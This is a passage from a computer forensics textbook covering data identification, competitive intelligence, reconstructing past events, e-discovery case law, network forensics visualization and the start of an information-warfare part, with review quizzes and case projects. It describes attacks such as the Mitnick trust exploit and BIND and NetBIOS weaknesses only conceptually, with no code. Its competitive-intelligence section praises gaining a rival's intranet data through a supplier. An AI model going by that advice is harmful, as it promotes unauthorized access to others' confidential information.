Case in point: The CIO of 3COM Corp
...
3com
...
html/),
makers of Internet switches and hubs, now supplies employees with two toll-free
numbers: one to report any intrusions into corporate secrets, the other to report
what 3COM’s rivals are up to
...

What is CI? Everything from illegal spying and theft of trade secrets to classic
intelligence-gathering—whatever it takes to provide executives with a systematic
way to collect and analyze public information about rivals and use it to guide strategy
...
Its goal: to anticipate, with
razor-sharp accuracy and speed, a rival’s next move, plot new opportunities, and
help avert disasters
...
Indeed, some companies, from Burger
King to Lucent Technologies Inc
...

For example, in 2002, Wal-Mart Stores Inc
...
Gathered by electronic scanners in checkout aisles, the data had been
closely monitored by various parties—from the companies that make products
sold in Wal-Mart’s more than 4,800 stores to Wall Street analysts
...
NutraSweet
estimates its intelligence unit is worth at least $70 million a year in sales gained or
revenues not lost
...
All information is now being thrown into the digital hopper and sliced and diced for
clues and leaks
...


294

Computer Forensics, Second Edition

What is the real bottom line? The new business-led push to get better competitive data (faster) is also defining new opportunities for CIO leadership at most
firms
...
Those responsible for business intelligence
activities will really be clued in; companies who have CIOs with competitive leadership abilities, will have the competitive edge in the years ahead
...
Most
existing systems and organizations are still ill-equipped to keep pace with the evergrowing amount of information available
...
The result is
that the key to carving out the leading edge of the knowledge gap in one’s industry
(the difference between what you know and what your rival knows) lies in the ability to build IT systems that can scope out the movements of corporate rivals in real
time
...
Players unable to surmount
their bureaucratic inertia will find their existence threatened
...

Therefore, it is recommended that you now start recruiting the technology executives who can build systems that will give your company the ability to react in
real time to what its rivals are doing
...
The goal is to tie technology and business together in a common pursuit of becoming more competitive and responsive
to rivals and customers in the marketplace
...
Companies are now installing radar in the corporate cockpit, and that’s
where the CIO comes in
...
The Net is opening up whole new ways to snoop, giving companies access
to material that used to take months or years and millions of dollars to unearth,
from satellite photos of rival plant sites, to the inside skinny on a rival CEO’s offwork activities
...
For example, the London-based consumer products
firm Unilever plc was looking to go into China with a new product, but Dollens and
Associates’ (Chicago-based) chief technology officer (CTO), by going on the Web,
discovered that Proctor & Gamble was developing a similar product
...
How did Unilever get

Identification of Data

295

wind of P&G’s plans? The CTO found P&G’s new product report on P&G’s own
corporate intranet—access to which Unilever was able to get through the CTO and
a common supplier
...

It takes far more than watching Web sites to get smart about CI
...
Shell’s CI office provides the CIO with benchmarks on competitors, and the CIO then develops customized search software to help the CI
team sift through files
...
It’s a mix of technology and people
...

Most CIOs are still far more likely to shop for technology than actively participate in CI tag teams and strategy sessions, but increasingly, companies like P&G
are realizing they cannot move forward on CI without asking CIOs to help tag and
distribute priority data to the people inside the company who most need to know
...
Recently, that happened to
a large telecom equipment maker with 30,000 home pages on its supply-chain intranet
...
This was a situation where the CIO
could have taken charge and made sure the information was in one spot
...
CI teams
should spend one-third of their time gathering information on a project, one-third
in analysis, and one-third discussing their findings
...
CIOs can step in and devise ways to improve the ability of executives to focus on information that really matters to them,
with filters that take out the junk nobody needs to be looking at
...
Often the
best competitive information does not appear as highly structured data, such as financial information
...

Once the best data is tagged for collection, who gets access to it? If you search
for data involving a two-in-one laundry soap and fabric softener, what terms do
you classify, and what do you let everyone see? CIOs can help companies figure out
how to tag, gather, store, and distribute a wide range of competitive data with differing levels of access and indexing—and with standards that are consistent
throughout the company, domestically and abroad
...
They haven’t marked documents as confidential, and nobody beyond a
certain level knows what specifically they’re looking for
...
With a proliferation of business relationships these days (joint
ventures, supply-chain collaborations, and so forth) you really need to do an information audit to make sure you know what you have and what you need
...
People who understand the
concept of organizing information and indexing it could be paired with someone
who understands different technology capabilities, such as a relational database
showing connections between different terms or items
...

However, don’t get carried away on the technology
...
None of them were able to take companies
through the process of data identification, discovery, distribution, and analysis
...
The thinking machine
has not yet arrived
...
CIOs need to help build that
...

Still not convinced? CIOs confident that their rivals’ intranet data is too safe to
even try prying open should take a ride (fly or drive) down Virginia’s Dulles Corridor, a throughway outside Washington, DC that is lined with high-tech firms
...
You can actually pick up one wireless network after another (hot
spots), including the networks of a major credit clearinghouse and Department of
Defense contractors that store classified data on their servers
...
Imagine the kind of damage a terrorist organization could do
...
Recent surveys have revealed that 80%
of these hot spots are not protected by firewalls, encryption, or intrusion detection
systems
...
For

Identification of Data

297

example, when Oracle Corp
...
, it didn’t use even a byte of cyber sleuthing
...

In other words, in this business, you need to be aggressive
...

Always recall the words of ancient Chinese general Sun Tzu (6th–5th century B
...
):
“Be so subtle that you are invisible, be so mysterious that you are intangible; then
you will control your rival’s fate
...
Many times the computer evidence
was created transparently by the computer’s operating system and without the
knowledge of the computer operator
...
It is this
information that benefits law enforcement and military agencies in intelligence
gathering and in the conduct of investigations
...
Such computer forensic software tools
and methods can also be used to identify backdated files and to tie a floppy diskette
to a specific computer
...
It is possible to hide diskettes within diskettes and to
hide entire computer hard disk drive partitions
...
The need for timely and unequivocal
identification of attackers is essential for such an approach to be effective
...
In addition, there may be some
complicating factors for the implementation of the type of identification and forensics capability discussed in this chapter, such as the widespread move to encryption
...


298

Computer Forensics, Second Edition

Conclusions
The hiding of data in computer graphic files (steganography)
Detection of steganography and watermarks
Steganography jamming techniques and theory
Data written to “extra” tracks
Data written to “extra” sectors
Data written to hidden partitions
Data stored as unallocated space
Massive amounts of data written to file slack areas
Data hidden by diffusion into binary objects, Windows swap, and Windows
page files
Hidden disks within disks
Floppy diskette data storage anomaly detection
Data scrubbing of ambient data storage areas
...

Data scrubbing of entire storage devices using methods that meet current Department of Defense security requirements
The potential risk of shadow data issues
The appending of data to program files, graphics files, and compressed data
files—simple and very effective
Electronic eavesdropping techniques, threats, risks, and remedies
Covert capture of keystrokes via hardware and radio interception
Tempest issues regarding the remote capture of computer screen images
Electronic eavesdropping techniques concerning cellular telephones
Electronic eavesdropping techniques concerning personal pagers
Search methodologies for use in the identification of foreign language phrases
in binary form stored on computer media

An Agenda for Action
When completing the Identification of Data Checklist (Table F10
...
The order is not significant; however, these are the
activities for which the researcher would want to provide a detailed description of
procedures, review, and assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


Identification of Data

299

CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...

5
...

Multiple Choice
1
...

A
...
National White Collar Crime Center
C
...
International Association of Computer Investigation Specialists
E
...
The NTP software includes drivers for a large number of devices, except for two
of the following that do not serve as references for stratum-one servers:
A
...
Land lines
C
...
Global positioning system (GPS) receivers
E
...
The CI’s goal is to do, with razor-sharp accuracy and speed, the following,
except for two:
A
...
Plot new opportunities

300

Computer Forensics, Second Edition

C
...
Help cause disasters
E
...
Which one of the following do financial organizations rely on for the accuracy
of their transactions?
A
...
File fragments
C
...

D
...
Erased files
5
...
NTP
B
...
DOS
D
...
WEP
Exercise
A CFS team (CFST) arrived at a company site to collect computer evidence from a
server
...
What did the CFST do to collect key evidence to
solve this problem?

HANDS-ON PROJECTS
The CTO of a large beverage company suspected something was amiss when he
noticed a significant amount of traffic traveling through the company network
...
A CFST
was contracted to perform a confidential after-hours investigation of the network
and the system administrators [4]
...
The goal of the investigation was to determine if the chief financial officer had
ordered his staff to alter or destroy transactions to help the company’s financial position appear more favorable [5]
...
The subject got into the network
and placed several large media files on several computers and changed the desktop
configurations
...
The IT department called and the CFST consulted on the case
[5]
...
, 126 Charles Street, Cambridge, MA 02141, 2002
...
, Wireless Broadband Networks Handbook: 3G, LMDS and
Wireless Internet, McGraw-Hill Professional, New York, 2001
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, Guidance Software, Inc
...
Marengo
Ave
...

[5] Mandall, Robert, Computer, Forensic Evidence Solutions, Inc
...
) 1212 Hope Ranch Lane, Las
Vegas, NV, 2002
...
A combination of hardware and
software tools has been developed using commercial off-the-shelf utilities integrated with newly developed programs
...
Processes have been developed to
recover hidden, erased, and password-protected data
...

Because there is a wide variety of computers, peripherals, and software available, including many different forms of archival storage (Zip, Jaz, disk, tape, CDROM, etc
...
Recovered data must be analyzed, and a coherent file must be reconstructed using advanced search programs specifically developed for this work
...
Case files going back over five years were cleared with the
information obtained
...
In the case of a murdered model, the
murderer’s computer address book was recovered and is now being used to determine if he might be a serial killer
...

The primary goal of this chapter is to illustrate how to reconstruct past events
with as little distortion or bias as possible
...
Anyone who has seen a slaying on
a police show can probably give a reasonably good account of the initial steps in an
investigation
...
Next, comes recording the area via photographs and note taking
...


HOW TO BECOME A DIGITAL DETECTIVE
Recovering electronic data is only the beginning
...
In other words, how do you reconstruct past
events to ensure that your findings will be admissible as evidence in your case?
What follows are some recommendations for accomplishing that goal
...
,” you may not
know what to do with the disk
...

Help may be just down the hall
...
They might not understand what you mean by a discovery request, but they may be able to help you convert the contents of the disk to
a form you can look at
...
They may have the tools you need to look at and start working with the data
you just received
...

In addition, your client may have the resources you need
...
If you are
using a litigation support vendor, that organization may be able to bring skills to
bear
...

Convert Digital Evidence
Before you can reconstruct past events and present the data, you need it on a
medium and in a format you can work with
...
Today, data can come
on a variety of media, such as holograms, video, data tapes, Zip disks, CD-ROM
disks, and even 3
...

If you receive electronic evidence on an 8-mm data tape, chances are that you
will not have an 8-mm tape drive at your desk
...
You need to get the data onto a medium your

Reconstructing Past Events

305

computer can read, which these days generally means a 3
...
How do you do this?
For example, you could use Zip disks
...
The cost of Iomega
Zip drives (http://www
...
com/global/index
...
CDs are even simpler,
as CD drives have become commonplace on PCs
...
5-inch disks
generally pose no problem
...
At
times this is not an issue
...
The formats most
likely to be useable without conversion are word processing files (principally WordPerfect and Word files), spreadsheet files (principally Excel and Lotus), and presentation files (principally PowerPoint files)
...
The format may be too new
...
In a similar vein, you may have to get the data converted if it comes to you in a format that
is too old or runs on a different operating system
...


UNUSABLE FILE FORMATS
You may get electronic data in a format that you cannot use “out of the box
...
You may have already encountered these issues
with a variety of files including email files, database files from mainframe systems,
and “
...
Anyone who has undertaken this task can attest that it is potentially a difficult and painstaking process
...
Initially, try to get as much information about
how the files were created and maintained as you can
...
For example, if you receive a “
...

Furthermore, get sample printouts if possible
...
They may show how the
data was laid out—and, hence, how it was used
...


CONVERTING FILES
If you are going to attempt converting the data yourself, you may be fortunate
enough to have received electronic data that you can covert directly into programs
such as Access or Excel using the wizards built into those programs
...
txt” files
...
If that information is not in the file, then try to get the field names and descriptions from the producing party
...

Sometimes data will not be in a format amenable to immediate conversion
...

Get the Right Software, Hardware, and Personnel
Concomitant with getting the data into a useable format is getting the right software, hardware, and personnel to work with the format you choose
...

mario
...
net/concordance/) meet most of your needs, but there are, of course,
a plethora of other good tools available
...

Hardware requirements will vary greatly depending on specific circumstances
...
A hundred gigabytes of data still pose very few problems
...
When faced with data

Reconstructing Past Events

307

of that quantity, you need to set up dedicated machines that do not pass queries or
results across your network
...
If you are going to make
sense of the electronic data you have received, converted, and loaded, you need
know how to use the tools yourself, or, failing that, rely on someone who can use
the tools for you
...
Also, once
you are in a position to work with the electronic data you got from outside resources, check that the data is what it ought to be
...
Prepare an
inventory of what you received and compare it against what you requested
...
More likely, however, it will require that you develop short descriptions of the data you received and
then match the descriptions with your discovery requests
...

You also can search the electronic data for references to electronic files that
should have been given to you but were not
...
The manual review can be enhanced if the software you are using to review
the data allows you to search for strings of characters
...
Examples include
...
htm,
...
htx,
...
mcw,
...
wps, and
...
csv,
...
dif,
...
wk1,
...
wk4,
...
wq1,
...
xlw
for spreadsheet files; and
...
csv,
...
dbf,
...
html,
...
mdb,
...
mdw,

...
txt, and
...

If you received spreadsheet or database files in their native format, you can
scrutinize them for signs of links to files that were used in connection with the files
you got but that were not given to you
...

It also can mean checking the “properties
...
In a
database file such as an Access file, this means closely examining all tables, queries,
forms, reports, macros, and modules for references to other files
...
If you go to File | Properties, you can sometimes find this information
...
You should go to File |
Properties, where you may be able to find out a host of details about the file that the
people sending it to you may never have known went with it
...

In word processing files, look for comments that display on the screen, but do
not automatically print out
...
If there are objects embedded in the word processing file, such as portions of spreadsheet files, try to ascertain the names of source files
...
Check the formula for references to other files
...
If the column listing across the top
reads “A B C E H,” that means there are at least three hidden columns (D, F, and
G) that might contain information of greater value than anything shown
...
Beware of cells that appear to be empty but are not
...
Look for
links to files you did not receive; in Access, this might be indicated by small arrows
to the left of the table icons
...
In tables, look for hidden fields
...
You
can test the data against itself
...
Look for errors as well
...
This comparison can highlight coding errors made when creating the database such as wrong
numbers, dates, and names
...
Just as electronic data can be compared to underlying
documents, so also can it be compared to data in other electronic files, the contents
of other documents, and information available through the Internet
...
That said, there are several general recommendations that can be offered:
Put the data into tools you can use
...
Database programs can permit one to search or query
the databases in complex and subtle ways, perform calculations, and generate a
broad range of reports
...


SUMMARY
Once the data has been successfully collected, it must be analyzed to extract the evidence you wish to present and to rebuild what actually happened
...

Finally, this is where logging utilities come in
...
Refining the firewall rules, keeping the intrusion detection systems (IDSs) current, and reviewing
the log files will be important to stay one step ahead of the bad guys
...

Collecting electronic evidence is no trivial matter
...

Gathering electronic evidence is far from impossible
...

Audit trails can also be used to reconstruct events after a problem has occurred
...
1 in Appendix F), the computer forensics specialist (CFS) should adhere to the provisional
list of actions for reconstructing past events
...
A
number of these systems have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Recovering electronic data is only the beginning
...
True or False? Even if the data is in a format that appears to be one you already
use, conversion may not be necessary
...
True or False? If you are going to attempt converting the data yourself, you may
be fortunate enough to have received electronic data that you can convert
directly into programs such as Access or Excel using the wizards built into
those programs
...
True or False? Once the data has been unsuccessfully collected, it must be analyzed
to extract the evidence you wish to present and to rebuild what actually happened
...
True or False? Refining the firewall rules, keeping the IDS current, and reviewing the log files will be important to stay one step ahead of the bad guys
...
The increase in computer-related crime has led to development of special tools
to recover and analyze what?
A
...
Computer data
C
...
Data specialists
E
...
Today, data can come on a variety of:
A
...
Media
C
...
Global positioning system (GPS) receivers
E
...
Having data on a useable medium is useless unless it also is in a:
A
...
Plot
C
...
Unuseable format
E
...
Hardware requirements will vary greatly depending on:
A
...
File fragments
C
...
Data miming
E
...
Electronic files often contain “hidden” data (information that does not show
up on any printouts of the file) that can potentially prove to be:
A
...
Not useful
C
...
Good
E
...
Management had identified four possible suspects but each denied
involvement
...
A CFS team (CFST) was
called to consult on the matter [2]
...
A default judgment had been entered against his
client because no answer had been filed with the court
...
However, the paralegal did not receive a stamped copy returned from the clerk and never followed up
...
A CFST was called in to perform a forensic analysis of the paralegal’s computer to determine when the document had been
created and last revised, hoping to verify her testimony [2]
...
The company requested that a CFST process the computer in
the subject’s office to determine if any evidence of the theft was there [2]
...
The intruder copied and then deleted almost 2,000 files relating to senior
executive compensation, corrupted the compensation database to give the clerk a
$250,000 raise, and tampered with audit trail information to disguise the date and
time of the intrusion
...
To make matters worse, the intruder physically stole another employee’s two-way pager and, from it, began sending increasingly threatening emails
to the clerk
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
(© 2002
Computer Forensic Evidence Solutions, Inc
...


This page intentionally left blank

12

Networks

s information systems become cheaper and cheaper, companies are rapidly
automating not only their overhead processes such as purchasing, payables,
hiring, and payroll, but also their value by adding processing such as marketing and sales
...
With this dependency comes a vulnerability: The ability of corporations to conduct their business is dependent on
technology that was designed to be as open as possible and that only a minority of
engineers and scientists understand
...
The
first way to do this is to analyze corporate resources for known vulnerabilities
...
This is what security scanners do
...
This is what intrusion detectors do
...

This is what firewalls do
...

What current intrusion detection systems (IDSs) do is monitor the network
and watch for specific patterns
...
However, if an attacker uses a method not previously known to
the IDS, it will transpire unnoticed, the corporate Web site will be defaced, employee records will be retrieved, or client lists will be extracted
...
Network forensics is the principle of reconstructing the activities leading to an event
and determining the answers to “What did they do?” and “How did they do it?” Instead of matching observed activities on a local area network (LAN) to a database
of known patterns of malicious intent, it records all activity on a LAN and provides
centralized tools to analyze the activity in real time for surveillance and historically
for damage assessment and prosecution
...
If a resource is accessible via a LAN for exploitation,
it is observable by a network forensics agent
...
Fortunately, a network
security system has been retaining all network packet information for the past six
months
...
These tools, in combination
with information produced from an on-sight investigation, are used to identify suspect communications
...
In addition,
patterns of network misuse invisible to system administrators, caused by other perpetrators, were discovered through pattern analysis
...


A TECHNICAL APPROACH
One approach here will be to use an interactive visualization interface to drive the
underlying network forensic data acquisition tools and analysis routines
...
To
achieve this, you should propose to investigate different visualization techniques to
model the network security data
...
In addition, you should tie
these data visualizers into a visual query interface that can drive the network security database backend
...
avs
...
html)
...
Rapid data analysis and rich visualization techniques combined with an intuitive, graphical application development environment make
AVS/Express the best choice for any data visualization task
...
Also, an interactive data flow process allows multiple visualization steps to be combined as a single visualization macro
...
It is
a modular, hierarchical, open, and extensible system with hundreds of predefined
components for visualizing data
...
This data can consist of, but is not limited
to, a time, date, IP address pair, session type, and duration
...
For example, network communications such as
email, ftp transfers, and http sessions are considered to be session types
...
The data warehouse should consist of the following two
stages: stage 1 collects all observed network transactions and records them into logs;
stage 2 summarizes these transactions into objects and communicants producing a
network event
...
If
successful, these will support a smooth interactive visual query interface while still
allowing drilling down into the more extensive databases with additional, more extensive queries
...
One approach to integrate these reports into the visualization engine is to
develop network forensic data models that can hold the different types of report
data and provide a seamless input into the visualization engine through data readers
...


318

Computer Forensics, Second Edition

Visual Query Interface
The visual query interface allows the network security analyst to interactively probe
the output of the network forensic data visualizers
...
One is to expose greater detail at a particular data point
...
Second, one may use node information as a way to give additional constraints to a drill down query
...
An effective data visualization is highly segregated by space and color
...
Range constraints can be applied based
on the node data or color values
...

The goal here is to investigate the effectiveness of each of the preceding techniques
in browsing and navigating the network forensics database
...

Network Forensic Data Visualizers
Network forensic data visualizers are key to an understanding of the network forensic data
...

You should also investigate a number of different visualizations of the network
forensic data to see which methods work best in conveying useful information to
the network forensic analyst
...
Such an approach could also support
the visual query interface in a browse/detail mode
...

The network forensic database also has several possibly different modes of investigation
...
In this case, the visualization performs a mapping from time-ordered to
space-ordered view or presents a specific time range with other parameters such as
duration, ip_address, and session type being mapped spatially
...


Networks

319

Binning is a method used to map data to spatial axes in uniformly sized bins
...
Unique categorical values
define a bin
...

In the second mode of investigation, a network-event view of the database is
appropriate
...
Connections
could represent paths an intruder has used to enter the network domain
...
The
courts treat email as formal records—no different than print communication—so
be prepared for the legal consequences, including the fact that your company’s
email is discoverable in litigation
...
Reams
and megabytes of Microsoft email messages dating from the 1990s (including
Gates’ own) were used skillfully by the government in its antitrust case against Microsoft
...

Accordingly, the courts will not hesitate to compel businesses to produce these
records and, further, to sanction them for their failure to do so
...
D
...

1995), the court required the corporate defendant, CIBA-Geigy Corporation, to
produce over 30 million email messages stored on backup tapes and to foot the
$50,000–$70,000 cost of searching the messages and formatting them into a readable form
...

That the electronic data may be duplicative of print documentation already
produced in litigation is irrelevant
...
Co
...
Caruth, et al
...
W
...

Ct
...
1990) failed to produce computer files despite already having produced
approximately 30,000 boxes of material containing the same information, the court
sanctioned the company by conclusively deeming each allegation against the company to be true, thereby precluding the company from contesting the allegations
and leading to a default judgment against it
...
Do you remember Oliver North, whose deleted email messages from the White House were
retrieved from a main frame backup tape during the Iran-Contra investigation? If

320

Computer Forensics, Second Edition

information that has been deleted has not yet been overwritten by the computer
system or is stored on back-up tapes or archive tapes, the information may still be
accessible
...
For example, in Computer Associates International, Inc
...
American
Fundware, Inc
...
R
...
166 (D
...
1990), a developer of a computer program, over the course of years, destroyed prior versions of a source code, retaining
only the current version
...
The
court held that the developer had received a copy of the lawsuit filed by the holder
of the copyright to the computer program but continued to destroy older versions
of the source code
...
Accordingly, the court entered default judgment against the developer as an appropriate sanction
...
Thompson Co
...
Gen’l Nutrition Corp
...

Supp
...
D
...
1984])
...

Sales Practices Litigation, 169 F
...
D
...
N
...
1997])
...
With such a policy in place, you may not stay out of the courtroom, but at least you will be prepared
if you ever find your company the target of a lawsuit or subpoena
...
This part of the chapter proposes the establishment of standards for the exchange of digital evidence between sovereign nations and is intended to elicit
constructive discussion regarding the damaging of digital evidence
...
Standard
operating procedures (SOPs) are documented quality-control guidelines that must
be supported by proper case records and use broadly accepted procedures, equipment, and materials
...

Guidelines that are consistent with scientific and legal principles are essential to the acceptance of results and conclusions by courts and other agencies
...

Rapid technological changes are the hallmark of digital evidence, with the
types, formats, and methods for seizing and examining digital evidence changing
quickly
...

Because a variety of scientific procedures may validly be applied to a given
problem, standards and criteria for assessing procedures need to remain flexible
...
In the digital evidence area, peer review of SOPs by
other agencies may be useful
...
Required
elements such as hardware and software must be listed, and the proper steps for successful use should be listed or discussed
...
Personnel who use
these procedures must be familiar with them and have them available for reference
...
Hardware used in the
seizure and examination of digital evidence should be in good operating condition
and be tested to ensure that it operates correctly
...

In general, documentation to support conclusions must be such that, in the absence of the originator, another competent person could evaluate what was done, interpret the data, and arrive at the same conclusions as the originator
...
Chainof-custody documentation must be maintained for all digital evidence
...
Handwritten notes and observations must be in ink, not pencil, although pencil (including
color) may be appropriate for diagrams or making tracings
...
Notes and records should be authenticated by
handwritten signatures, initials, digital signatures, or other marking systems
...

A quality forensic program consists of properly trained personnel and appropriate
equipment, software, and procedures to collectively ensure these attributes
...
Composed of accredited government agencies involved in
computer forensic investigations, the IOCE identifies and discusses issues of interest to its constituents, facilitates the international dissemination of information,
and develops recommendations for consideration by its member agencies
...

In response to the G-8 Communique and Action plans of 1997, the IOCE was
tasked with the development of international standards for the exchange and recovery of undamaged electronic evidence
...

During the International Hi-Tech Crime and Forensics Conference (IHCFC)
of October 1999, the IOCE held meetings and a workshop that reviewed the United
Kingdom Good Practice Guide and the Scientific Working Group on Digital Evidence (SWGDE) Draft Standards
...
The
international principles developed by the IOCE for the standardized recovery of
computer-based evidence are governed by the following attributes:
Consistency with all legal systems
Allowance for the use of a common language
Durability
Ability to cross international boundaries
Ability to instill confidence in the integrity of evidence
Applicability to all forensic evidence
Applicability at every level, including that of individual, agency, and country [2]
Furthermore, the following international principles were presented, approved,
and approved again at the IHCFCs in October 1999 and 2001, respectively
...

When it is necessary for a person to access original digital evidence, that person
must be forensically competent
...

An individual is responsible for all actions taken with respect to digital evidence
while the digital evidence is in his possession
...

So, do you have a well-documented intrusion-detection response plan? In other
words, if you are attacked, do you have the documentation tools that are needed to
record the attack, so that you can make the proper response? Let’s take a look
...
There is also a need to have written requirements
for training IT staff on how to deal with intrusions
...
Training
should also include some form of regular fire drill
...
It is critical to capture as much information
as possible and create forms enabling users who are not intrusion detection specialists to provide as much information as possible
...

Target systems and networks
...


324

Computer Forensics, Second Edition

Purpose of systems under attack
...

Evidence of intrusion
...

List of parties to notify
...

Finally, when it comes to hardening your network against hackers, the best defense is to keep abreast of developing threats and to test your system with due diligence
...


SYSTEM TESTING
It seems you can’t open a newspaper or listen to the news these days without learning that yet another company’s network has been broken in to
...
Even worse, thanks to the advent
of always-on DSL, ISDN, and cable modem connections, security breaches that
were once limited to large corporations or government facilities are now finding
their way into your homes as well
...
Fortunately, it’s
not hard to decrease the odds of attack or intrusion
...
In other words, a little effort can go a long way toward
securing your network
...
DNSs also provide a standard Internet mechanism
for storing and accessing other types of data, such as MX (mail exchange) records
...
Designed to be a robust, stable system on which
to build a sound organizational naming architecture, BIND (especially in its earliest versions) is notorious for its vulnerabilities
...
2
...

To make matters worse, network intrusion programs that automatically scan
networks and query corporate DNS servers looking for holes are becoming increasingly available to hackers, who use these programs to test a system’s locks the
way a traditional burglar might jiggle a doorknob
...

Once compromised, the DNS server can be used to launch disturbances such as
distributed DoS (denial of service) attacks to disrupt your business
...
First,
if yours is one of the many companies that runs outdated DNS software, an upgrade
is definitely in order
...

Your next step should be to limit your access to port 53 (the DNS port) on your
firewalls
...

Services and File Sharing
Although services and file sharing capabilities are available on both Windows and
Unix, Windows computers receive the brunt of file sharing attacks from trojan
horses and share compromises
...
These shares can then be run from any client machine with “log on as service” rights
...
Doing so will also improve network performance
...
Nothing extraneous should ever be put into use
...
Because Windows’ file-sharing service uses NetBIOS, the same mechanism that permits file sharing can also be used to retrieve sensitive system information, such as user names,
configuration information, and certain registry keys, via a “null session” connection
to the NetBIOS session service
...

Again, your best defense is diligence
...
Granted, it’s much easier to share an entire directory or forbid an entire
drive, but the extra effort necessary to provide more granular access privileges will
be well worth it
...
Even security experts readily
admit that firewalls and anti-virus procedures can offer only casual, “business as
usual” protection
...
There’s no way to secure your network against those kinds of attacks
...
Any protection is better than none
...
As
previously explained, network forensics is the principle of reconstructing the activities leading to an event and determining the answer to What did they do? and How
did they do it? Protecting your network against hackers need not be a full-time job
...

Conclusions
One approach to network intrusion detection and network forensics depends
on the development of new data visualization techniques to address the volumes of data collected in a forensics application
...
This comprehensive collection posture results in very large datasets that necessitate the use of data visualization techniques to reasonably analyze events
...
This will consist of gaining an understanding of IP session attributes, mapping these attributes to visual resources (x-axis,
y-axis, z-axis, color, shape, thickness, etc
...

The resulting visualizations should allow an analyst with a cursory understanding of data networks to identify normal patterns of network traffic and
therefore identify deviations from the norm
...

Different visualizations will be explored with ease of use and data density as the
evaluation criteria
...

The term evidence implies that the collector of evidence is recognized by the courts
...

A data object or physical item only becomes evidence when so deemed by a law
enforcement official or designee
...

Data objects may occur in different formats without altering the original information
...

Physical items are items on which data objects or information may be stored or
through which data objects are transferred
...

Duplicate digital evidence is an accurate digital reproduction of all data objects
contained on an original physical item
...

With forensic competency, there is a need to generate an agreement on international accreditation and the validation of tools, techniques, and training
...

The sharing of information that relates to high-tech crime and forensic computing is needed, such as events, tools, and techniques
...

With the volume of network traffic increasing every day, network security remains a top priority
...


328

Computer Forensics, Second Edition

An Agenda for Action
When completing the Networks Checklist (Table F12
...
The order is not significant; however, these are the activities for which
the researcher would want to provide a detailed description of procedures, review,
and assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...

5
...

Multiple Choice
1
...
Network forensic data and database
B
...
Network forensic data visualizers
D
...
Visual query data

Networks

329

2
...
Consistency with all legal systems
B
...
Fragility
D
...
Ability to instill confidence in the integrity of evidence
3
...
They are as follows, except:
A
...

B
...

C
...

D
...

E
...

4
...
Private information for person(s) discovering problem and responsible
parties
...
Target systems and networks
...

C
...
Know what systems are used for (payroll,
R&D, and so on), as well as some kind of a ranking of the importance of the
system
...
Evidence of intrusion
...

E
...
This can include the technical contacts, internal
legal contacts, and possibly the legal authorities
...
What current intrusion detection systems (IDSs) do is monitor the network
and watch for:
A
...
Specific patterns
C
...
Good patterns
E
...
In the
litigation, the version of the email in the sender’s possession was silent on the issue
of certain contract terms
...
It was alleged that one of the parties had tampered with
its electronic record, which had been sent from a Lotus Notes environment into a
Microsoft Outlook environment
...

So, how were they able to determine “who dunnit?”

HANDS-ON PROJECTS
When the CEO of a major company opened his email one morning, he was shocked
to see that overseas hackers were sending him confidential files from his own desktop hard drive
...
A CFST, working with the client’s
network personnel, preserved the evidence of the attack and assisted in determining how the attack occurred
...
The
company’s firewall logs indicated that the employee had downloaded terabytes of
data, and audit logs indicated that he had corrupted several production databases
...
A CFST
was called in to solve the problem
...

Optional Team Case Project
In March 2004, one of the largest independent Internet securities trading firms
contacted a CFST with a critical problem
...
The

Networks

331

company suspected an employee, a database programmer who had stormed out of
the business three days before, unhappy with his severance negotiations
...
Please
explain how the CFST went about solving this problem
...

[2] U
...
Department of Justice, Federal Bureau of Investigation, J
...
C
...


This page intentionally left blank

Part

IV

Countermeasures:
Information Warfare

he fourth part of this book discusses how to fight against macro threats,
defensive strategies for governments and industry groups, the information
warfare arsenal and tactics of the military, the information warfare arsenal
and tactics of terrorists and rogues, the information warfare arsenal and tactics of
private companies, the information warfare arsenal of the future, surveillance tools
for information warfare of the future, and civilian causalities (the victims and
refugees of information warfare)
...
The National Security Agency (NSA) traces the
macro threat from hostile or potentially hostile governments as well as drug lords,
criminal cartels, and increasingly computer-savvy guerrilla groups
...
S
...

Cyberblitzes like those that briefly knocked out major Web sites a few yeas ago
(including Yahoo! Inc
...
’s auction service, and Amazon
...
’s retail site) could easily be copied on a larger scale
...
And if it should happen, a
future President had better move faster than Bush did during those infamous 7
minutes of pondering what to do when told of the 9-11 attacks
...
The NSA and other U
...
officials seem to be stepping up a public awareness campaign, spurred by the spread of
information technology, growing knowledge of malicious computer code, and ever
greater U
...
reliance on networked systems
...
S
...
” A reasonable question that should be asked is
“Why are we vulnerable?” In a recent report, the Defense Science Board Task Force
on Information Warfare, lays the blame at the U
...
government’s own doorstep
...
Program by program,
economic sector by economic sector, the U
...
government has based critical functions
on inadequately protected telecomputing services
...
S
...
S
...
From the standpoint of
psychological operations, it’s not so much exploited technology as it is that the U
...

government has created a global information system it does not control and does not
understand, and this in turn creates additional targets for exploitation
...

Recently, for example, a private security company alerted the FBI that it found
a malicious program on some 3,000 computers that could be remotely activated to
launch an attack on a site of choice—a trojan horse
...
In addition to the technological risk posed by many of these computers having very limited or no security, the users of these computers often are
attractive targets for social engineering efforts for a simple reason
...

From an IW perspective, there are three primary target for the attacker using psychological operations (psyops)
...
If the attacker is simply a hacker, cracker, or script-kiddie, it might
be for nothing more than to grab a credit card number or prove to friends that he or
she could do it
...
S
...
The government also faces the threat of multinational efforts to subvert their defenses and find an economic, diplomatic, or military advantage
...
S
...
S
...
The U
...

government also cannot discount the potential entrance of organized crime into the
equation, not to mention political activists and disgruntled employees
...
Although the commercial sector is beginning to realize the importance of security, the
information on virtually unprotected personal machines may very well hold the key
to a crippling attack on any sector simply because those sectors exist to allow the
personal machines to connect to do business
...
One of the most often
cited examples of a physical trust relationship that was exploited successfully is
the Mitnick attack
...
He was able to determine the probable response that host A would give to host
B after receiving the initiating packet in a three-way handshake
...
He then sent the expected response along with a small payload that contaminated host A’s
...
He dropped the attack on host B and simply accessed A as a
trusted root user
...
Imagine a worker at a large corporate call center
...
